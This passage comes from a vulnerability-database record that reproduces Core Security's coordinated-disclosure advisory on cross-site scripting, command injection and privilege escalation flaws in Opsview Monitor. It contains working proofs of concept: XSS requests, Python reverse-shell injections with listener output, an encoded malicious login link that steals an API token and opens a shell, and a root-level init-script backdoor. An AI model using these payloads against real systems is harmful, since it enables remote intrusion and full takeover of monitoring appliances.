"url": "https://\u003cserverip\u003e/login?back=%2frest%2fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmfyihhocia9ig5ldybytuxidhrwumvxdwvzdcgpo3hoci5vbnjlywr5c3rhdgvjagfuz2ugpsbmdw5jdglvbigpihtpziaoeghylnjlywr5u3rhdgugpt0gwe1mshr0cfjlcxvlc3qure9orsl7cmvnzxhwid0glyg%2fonjlc3rub2tlbii6iikolio%2fksg%2foiiplzt0b2tlbia9ihjlz2v4cc5legvjkhhoci5yzxnwb25zzvrlehqpwzfdo3jlz2v4cca9ic8opzp1c2vytmftzsi6iikolio%2fksg%2foiiplzt1c2vybmftzsa9ihjlz2v4cc5legvjkhhoci5yzxnwb25zzvrlehqpwzfdo3zhcib4ahiyid0gbmv3ifhnteh0dhbszxf1zxn0kck7eghymi5vcgvukcdqt1nujywgjy9yzxn0l2nvbmzpzy9ub3rpzmljyxrpb25tzxrob2qvdgvzdg5vdglmawnhdglvbi8nlcb0cnvlktt4ahiylnnldfjlcxvlc3rizwfkzxioingtb3bzdmlldy11c2vybmftzsisihvzzxjuyw1lkttjb25zb2xllmxvzyh1c2vybmftzsk7y29uc29szs5sb2codg9rzw4po3hocjiuc2v0umvxdwvzdehlywrlcigiec1vchn2awv3lxrva2vuiiwgdg9rzw4po3hocjiuc2v0umvxdwvzdehlywrlcigiq29udgvudc1uexbliiwgimfwcgxpy2f0aw9ul2pzb24ikttib2r5id0geyjtzxnzywdlijoivgvzdcbnzxnzywdliiwiy29tbwfuzci6inn1ym1pdf94bxbwx3njcmlwdcisinzhcmlhymxlcyi6w10sinrlc3rfdmfyawfibgvzijpbeyjuyw1lijoiuefhrviilcj2ywx1zsi6ijeymzeymzeymyb8fcbwexrob24glwmgj2ltcg9ydcbzb2nrzxqsc3vichjvy2vzcyxvcztzpxnvy2tldc5zb2nrzxqoc29ja2v0lkfgx0lorvqsc29ja2v0llnpq0tfu1rsrufnkttzlmnvbm5ly3qokfwipgf0dgfja2vysva%2bxcismtywmdapkttvcy5kdxaykhmuzmlszw5vkcksmck7ig9zlmr1cdiocy5mawxlbm8okswxktsgb3muzhvwmihzlmzpbgvubygpldipo3a9c3vichjvy2vzcy5jywxskftcii9iaw4vc2hciixcii1pxcjdktsnin1dlcjpzci6ijeiftt4ahiylnnlbmqoslnpti5zdhjpbmdpznkoym9keskpo2fszxj0khrva2vuktthbgvydch1c2vybmftzsk7fx07eghylm9wzw4oj1bpu1qnlcanl3nldhrpbmdzlycsihrydwupo3hoci5zzw5kkg51bgwpow%3d%3d%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://www.opsview.com/solutions"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17454"
},
{
"db": "VULMON",
"id": "CVE-2018-16147"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010275"
},
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "NVD",
"id": "CVE-2018-16147"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-156"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-17454"
},
{
"db": "VULMON",
"id": "CVE-2018-16147"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010275"
},
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "NVD",
"id": "CVE-2018-16147"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-156"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-17454"
},
{
"date": "2018-09-05T00:00:00",
"db": "VULMON",
"id": "CVE-2018-16147"
},
{
"date": "2018-12-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010275"
},
{
"date": "2018-09-05T17:57:27",
"db": "PACKETSTORM",
"id": "149236"
},
{
"date": "2018-09-05T21:29:02.937000",
"db": "NVD",
"id": "CVE-2018-16147"
},
{
"date": "2018-09-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-156"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-17454"
},
{
"date": "2018-11-13T00:00:00",
"db": "VULMON",
"id": "CVE-2018-16147"
},
{
"date": "2018-12-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010275"
},
{
"date": "2018-11-13T14:53:36.727000",
"db": "NVD",
"id": "CVE-2018-16147"
},
{
"date": "2018-09-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-156"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-156"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Opsview Monitor cross-site scripting vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010275"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-156"
}
],
"trust": 1.4
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-156"
}
],
"trust": 0.7
}
}
VAR-201809-0902
Vulnerability from variot - Updated: 2023-12-18 12:01The test connection functionality in the NetAudit section of Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to command injection due to improper sanitization of the rancid_password parameter. Opsview Monitor Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. OpsviewMonitor is a virtual appliance designed to be deployed in an organization's network infrastructure. It is bundled with the web management console to monitor and manage the host and its services. OpsviewMonitor has a command execution vulnerability that allows an attacker to obtain command execution on the system as a nagios user. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
Opsview Monitor Multiple Vulnerabilities
- Advisory Information
Title: Opsview Monitor Multiple Vulnerabilities Advisory ID: CORE-2018-0008 Advisory URL: http://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities Date published: 2018-09-04 Date of last update: 2018-09-04 Vendors contacted: Opsview Release mode: Coordinated release
- Vulnerability Information
Class: Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Execution with Unnecessary Privileges [CWE-250] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-16148, CVE-2018-16147, CVE-2018-16146, CVE-2018-16144, CVE-2018-16145
- Vulnerability Description
Opsview's website states that:
Opsview[1] builds monitoring software that helps DevOps understand how the performance of their hybrid IT infrastructure & apps impacts business service delivery. Opsview Monitor supports +3500 Nagios plugins and service checks making it easy to monitor everything from Docker and VMware to Amazon Web Services, Hyper-V and more.
- Vulnerable Packages
. Opsview Monitor 5.4 . Opsview Monitor 5.3 . Opsview Monitor 5.2
Other products and versions might be affected, but they were not tested.
- Vendor Information, Solutions and Workarounds
Opsview released the following versions of its product that fix the reported issues. Opsview Monitor 6.0 . Opsview Monitor 5.4.2 . Opsview Monitor 5.3.1
In addition, Opsview published the following release notes:
. https://knowledge.opsview.com/v5.4/docs/whats-new . https://knowledge.opsview.com/v5.3/docs/whats-new
- Credits
These vulnerabilities were discovered and researched by Fernando Diaz and Fernando Catoira from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
- Multiple vulnerabilities were found in the context of this appliance, which could allow a remote attacker to compromise the system. Vulnerabilities described in 7.1 and 7.2 could be abused to execute malicious JavaScript code in the context of a legitimate user. Finally, the issue found in one of the scripts run during the boot process presented in 7.5 would allow attackers to elevate their privileges from nagios user to root after a system restart, hence obtaining full control of the appliance.
7.1. Reflected Cross-Site Scripting in Diagnostics
[CVE-2018-16148] The 'diagnosticsb2ksy' parameter of the '/rest' endpoint is vulnerable to Cross-Site Scripting.
The following proof of concept demonstrates the vulnerability:
/----- GET /rest/diagnosticsb2ksy%253cscript%253ealert(1)%253c%252fscript%253ev7uol%3ffilename=1%26download=1 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: opsview_web_session=46f985298c7bba5291a18c3a749362a08eaa9401; auth_tkt=ODFlYjc4YjVlN2M5ZmQ2MDUyNzhlMTEyZTM1ZjRmODM1YWI5ODUzMGFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 -----/
7.2. Persistent Cross-Site Scripting in Settings endpoint
[CVE-2018-16147] The 'data' parameter of the '/settings/api/router' endpoint is vulnerable to Cross-Site Scripting. The following proof of concept demonstrates the vulnerability:
/----- POST /settings/api/router?_dc=1521575692128 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https:///settings/ x-opsview-username: rifle x-opsview-token: 053f415648640ea5a9d0c6e3e7f5603cf7b08503 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 506 Cookie: opsview_web_session=3b8059865b28b96a5cd27a6d4fb4193bed9aa256; auth_tkt=ZTFiMzFlODc1ZDUzYzk3MzEwMGM2MjhiZTgxMzRhMDQ1YWIxNWNlOXBlbnRlc3QhREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsTkFWT1BUSU9OUyxOT1RJRllTT01FLFBBU1NXT1JEU0FWRSxSUkRHUkFQSFMsVklFV0FMTCE%3D Connection: close
[{"action":"SettingsServer","method":"setObjecttypeState","data":["alert(4)","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":2},{"action":"SettingsServer","method":"setObjecttypeState","data":["profile","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":3}] -----/
The input will be stored without any sanitization and rendered every time the /settings section is visited by the user. It's important to point that this XSS is self stored and it's executed only in the context of the victim's session. However, this vulnerability can be exploited by an attacker to gain persistency and execute the malicious code each time the victim accesses to the settings section. Excerpt of the source code showing the injected script tag:
/----- [{"property":"name","root":"data","direction":"ASC"}]}},"contact":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"name","root":"data"}]}},"alert(4)":{"storeState":{"sorters":[{"root":"data","property":"name","direction":"ASC"}],"pageSize":50,"filters":[],"page":1}},"hostcheckcommand":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"priority","root":"data"}]}},"netflow_collector":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}],"page":1,"filters":[],"pageSize":50}},"alert(4)":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}]," -----/
7.3. Notification abuse leading to remote command execution
[CVE-2018-16146] Opsview Web Management console provides a functionality accessible by an authenticated administrator to test notifications that are triggered under certain configurable events. The 'value' parameter is not properly sanitized, leading to an arbitrary command injection executed on the system with nagios' user privileges.
The following proof of concept executes a reverse shell:
/----- POST /rest/config/notificationmethod/testnotification?_dc=1520444703477 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https:///settings/ x-opsview-username: admin x-opsview-token: 7ac1116c336cc648cda6caa707a17d7aa6114074 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 376 Cookie: redirect=1; testing=1; sid=9bfa04afc5ccc966c623078bab8834e0; opsview_web_session=5071271ffb62fffffcb589c9ae9ab9c23d780b13; auth_tkt=MDA1M2JmODhmYTlmNWM1NDEyNzM3ZWRiYWJiMTBmZTA1YWEwMWY0M2FkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D Connection: close
{"message":"Test Message","command":"submit_xmpp_script","variables":[],"test_variables":[{"name":"PAGER","value":"123123123 || python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\",16000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"}],"id":"20"} -----/
/----- nc -lvp 16000 Listening on [0.0.0.0] (family 0, port 16000) Connection from [] port 16000 [tcp/*] accepted (family 2, sport 43016) $ id uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview) -----/
Additionally, it is possible to combine this issue with a redirection functionality within the management console and the vulnerability described in 7.1 (Reflected Cross-Site Scripting), to build a specially crafted link that could be sent to an administrator to trigger a reverse shell.
In order to perform the attack, consider the following:
. API's sensitive actions require a 'restToken' to be processed. This token could be obtained by a Cross-Site Scripting attack from a specific endpoint (/settings). Abuse the login page redirection functionality to force the user to access the Cross-Site Scripting vulnerable URL described in 7.1 (you may also abuse the Cross-Site scripting vulnerability reported in https://www.cvedetails.com/cve/CVE-2016-2511/ given it is still present). If the user is already authenticated he will be automatically redirected. Otherwise, the login page will appear and the redirection will take place after a successful login.
The following proof of concept presents a crafted link that could trigger a reverse shell if accessed by an administrator:
/----- https:///login?back=%2Frest%2Fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpIHtpZiAoeGhyLnJlYWR5U3RhdGUgPT0gWE1MSHR0cFJlcXVlc3QuRE9ORSl7cmVnZXhwID0gLyg%2FOnJlc3RUb2tlbiI6IikoLio%2FKSg%2FOiIpLzt0b2tlbiA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3JlZ2V4cCA9IC8oPzp1c2VyTmFtZSI6IikoLio%2FKSg%2FOiIpLzt1c2VybmFtZSA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3ZhciB4aHIyID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7eGhyMi5vcGVuKCdQT1NUJywgJy9yZXN0L2NvbmZpZy9ub3RpZmljYXRpb25tZXRob2QvdGVzdG5vdGlmaWNhdGlvbi8nLCB0cnVlKTt4aHIyLnNldFJlcXVlc3RIZWFkZXIoIngtb3Bzdmlldy11c2VybmFtZSIsIHVzZXJuYW1lKTtjb25zb2xlLmxvZyh1c2VybmFtZSk7Y29uc29sZS5sb2codG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigieC1vcHN2aWV3LXRva2VuIiwgdG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigiQ29udGVudC1UeXBlIiwgImFwcGxpY2F0aW9uL2pzb24iKTtib2R5ID0geyJtZXNzYWdlIjoiVGVzdCBNZXNzYWdlIiwiY29tbWFuZCI6InN1Ym1pdF94bXBwX3NjcmlwdCIsInZhcmlhYmxlcyI6W10sInRlc3RfdmFyaWFibGVzIjpbeyJuYW1lIjoiUEFHRVIiLCJ2YWx1ZSI6IjEyMzEyMzEyMyB8fCBweXRob24gLWMgJ2ltcG9ydCBzb2NrZXQsc3VicHJvY2VzcyxvcztzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtzLmNvbm5lY3QoKFwiPGF0dGFja2VySVA%2BXCIsMTYwMDApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFtcIi9iaW4vc2hcIixcIi1pXCJdKTsnIn1dLCJpZCI6IjEifTt4aHIyLnNlbmQoSlNPTi5zdHJpbmdpZnkoYm9keSkpO2FsZXJ0KHRva2VuKTthbGVydCh1c2VybmFtZSk7fX07eGhyLm9wZW4oJ1BPU1QnLCAnL3NldHRpbmdzLycsIHRydWUpO3hoci5zZW5kKG51bGwpOw%3D%3D%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1 -----/
Once clicked, the authenticated administrator will be redirected to the vulnerable section where his browser will perform a request to the '/settings' endpoint in order to obtain a valid 'restToken'. Finally, using that token, the API request to 'rest/config/notificationmethod/testnotification' will be exploited thus resulting in a reverse shell.
7.4. Rancid test connection functionality abuse leading to command execution
[CVE-2018-16144] NetAudit is a section within Network Analyzer that allows the user to automate the backing up of network devices' configuration files to a centralized location.
The following proof of concept executes a reverse shell:
/----- POST /rest/config/host/test_rancid_connection?_dc=1521569909290 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https:///settings/ x-opsview-username: admin x-opsview-token: b3d716e0157fd6337e6978220188051d8c578850 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 434 Cookie: opsview_web_session=8f48a60452543863c3ee3662202a0d0ef568e86f; auth_tkt=ZTJlMWFlODQ4ZTVhYmJiN2I3YTQzNWYxNzkzYjAxYWU1YWIxNGI1NWFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D Connection: close
ip=++++++&rancid_vendor=1&rancid_username=234234+add+password+xxxxx&rancid_connection_type=telnet&rancid_autoenable=1&rancid_password=2342342342+%3b+sleep%2011%3b%20python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("<attackerIP>",16000))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b'&host_id=2
-----/
/----- nc -lvp 16000 Listening on [0.0.0.0] (family 0, port 16000) Connection from [] port 16000 [tcp/*] accepted (family 2, sport 43016) $ id uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview) $ uname -a Linux image-builder-299 4.4.0-1010-aws #10-Ubuntu SMP Tue Jan 9 23:01:34 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux -----/
7.5. Script modification could allow local privilege escalation
[CVE-2018-16145] Most of the services in Opsview Monitor run with nagios privileges and the scripts that run at boot time, impersonate nagios user during its execution. However, the '/etc/init.d/opsview-reporting-module' script invokes the '/opt/opsview/jasper/bin/db_jasper' script before dropping root privileges.
The following excerpt shows the vulnerable code:
/----- /etc/init.d/opsview-reporting-module:
/opt/opsview/jasper/bin/db_jasper db_exists 2> /dev/null if [ $? != 0 ]; then echo "Attempted to start jasperserver but MySQL credentials are wrong." exit 0 fi
DAEMON=/opt/opsview/jasper/bin/rc.jasperserver
test -x $DAEMON || exit 0
Switch to opsview user if run as root
id | grep "uid=0(" >/dev/null if [ $? = 0 ] ; then su - opsview -c "$DAEMON $@" else exec $DAEMON $@ fi -----/
The file '/opt/opsview/jasper/bin/db_jasper', which is invoked by the vulnerable script, can be edited by the nagios user which belongs to the 'opsview' group.
/----- ls -ltr /opt/opsview/jasper/bin/db_jasper -rwxrwxr-x 1 opsview opsview 2531 Feb 6 2017 /opt/opsview/jasper/bin/db_jasper nagios@image-builder-299:/home/admin$ id uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview) -----/
Since 'db_jasper' receives 'db_exists' as an argument, which is later used in a case statement, an attacker could edit that specific part of the script in order to execute arbitrary code once the appliance is rebooted.
The following excerpt shows the attacker's bash script which, after execution, will trigger a reverse shell with root privileges:
/----- while [ "x$1" != "x" ] ; do case "$1" in db_export) db_export ;; db_export_test) db_export_test ;; db_export_initial) TEST=1 db_backup ;; db_import) db_import ;; db_install) db_install ;; db_backup) db_backup ;; db_restore) db_restore ;; db_exists) python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",16000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' & db_exists exit $? ;; db_upgrade) db_upgrade exit $? ;; *) die "Usage: $0 {db_export|db_import|db_install|db_backup|db_restore}" ;;
esac
shift
done -----/
/----- $nc -lvp 16000 Listening on [0.0.0.0] (family 0, port 16000) Connection from [] port 16000 [tcp/*] accepted (family 2, sport 45566)
id
uid=0(root) gid=0(root) groups=0(root) -----/
- Report Timeline
2018-05-03: Core Security sent an initial notification to Opsview, asking for GPG keys in order to send draft advisory. 2018-05-04: Opsview replied attaching its GPG keys. 2018-05-04: Core Security sent the encrypted draft advisory. 2018-05-04: Opsview confirmed the reception of the advisory and informed an initial response would be ready by May 11th. 2018-05-11: Opsview replied saying they were able to reproduce all of the reported vulnerabilities and confirmed that they were present in all supported versions of Opsview Monitor (5.4, 5.3 and 5.2). In addition, Opsview informed that were planning to release a fix for these versions by the end of July. 2018-05-11: Core Security thanked the confirmation. 2018-06-25: Opsview informed that they were planning to release a major update for the product (6.0) at the end of July. This update will address all reported vulnerabilities. Also, they informed that the previous versions of the product would be fixed by the end of August. 2018-06-27: Core Security thanked the status update and asked for a tentative public disclosure date. 2018-07-16: Core Security requested a status update. 2018-07-18: Opsview proposed to set a tentative publication date by the end of August when they release the fixes for its earlier versions. 2018-07-18: Core Security agreed with the Opsview's proposal. 2018-07-23: Opsview notified Core Security that the Opsview Monitor 6.0 release will be available on July 25th. In addition, they informed that they didn't have the exact release date for the updates to previous versions of the product. 2018-08-06: Core Security requested a status update for the remaining fixes. 2018-08-13: Opsview replied saying that they were targeting the week of August 24th for release the fixes of their earlier product versions and they would confirm the exact date at the end of the next week. 2018-08-13: Core Security thanked the reply. 2018-08-24: Opsview informed Core Security that the remaining fixed versions will be available on August 29th. 2018-08-24: Core Security thanked the update and proposed September 4th as the coordinated release date. 2018-08-28: Opsview agreed on the proposed release date. 2018-09-04: Advisory CORE-2018-0008 published.
- References
[1] https://www.opsview.com/solutions
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201809-0902",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "opsview",
"scope": "lt",
"trust": 1.0,
"vendor": "opsview",
"version": "5.3.1"
},
{
"model": "opsview",
"scope": "gte",
"trust": 1.0,
"vendor": "opsview",
"version": "5.4.0"
},
{
"model": "opsview",
"scope": "lt",
"trust": 1.0,
"vendor": "opsview",
"version": "5.4.2"
},
{
"model": "opsview",
"scope": "lt",
"trust": 0.8,
"vendor": "opsview",
"version": "5.4.x"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.8,
"vendor": "opsview",
